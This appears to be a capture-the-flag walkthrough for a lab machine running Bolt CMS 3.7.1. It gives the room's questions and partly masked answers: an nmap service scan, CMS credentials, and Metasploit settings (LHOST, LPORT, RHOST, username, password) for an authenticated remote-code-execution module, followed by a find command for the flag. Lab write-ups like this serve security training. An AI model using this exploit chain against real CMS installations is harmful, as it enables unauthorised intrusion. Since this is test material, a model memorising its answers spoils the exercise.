-
Start the machine
no answer needed -
What port number has a web server with a CMS running?
nmap -sV <TARGET_IP>8000
-
What is the username we can find in the CMS?
bolt
-
What is the password we can find for the username?
*****d*in123
-
What version of the CMS is installed on the server? (Ex: Name 1.1.1)
- Login into the page
<TARGET_IP>/boltwith username and password previously found. Bolt 3.7.1
- Login into the page
-
There's an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What's its EDB-ID?
- Search on Google
Bolt RCE Exploit DB ***2*
- Search on Google
-
Metasploit recently added an exploit module for this vulnerability. What's the full path for this exploit? (Ex: exploit/....)
msfconsolesearch boltuse *exploit/unix/******************************
-
Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit
no answer neededset LHOST <YOUR_IP>set LPORT 1234set RHOST <TARGET_IP>set USERNAME boltset PASSWORD ************
-
Look for flag.txt inside the machine.
exploitcat $(find / | grep flag.txt)THM{***************************}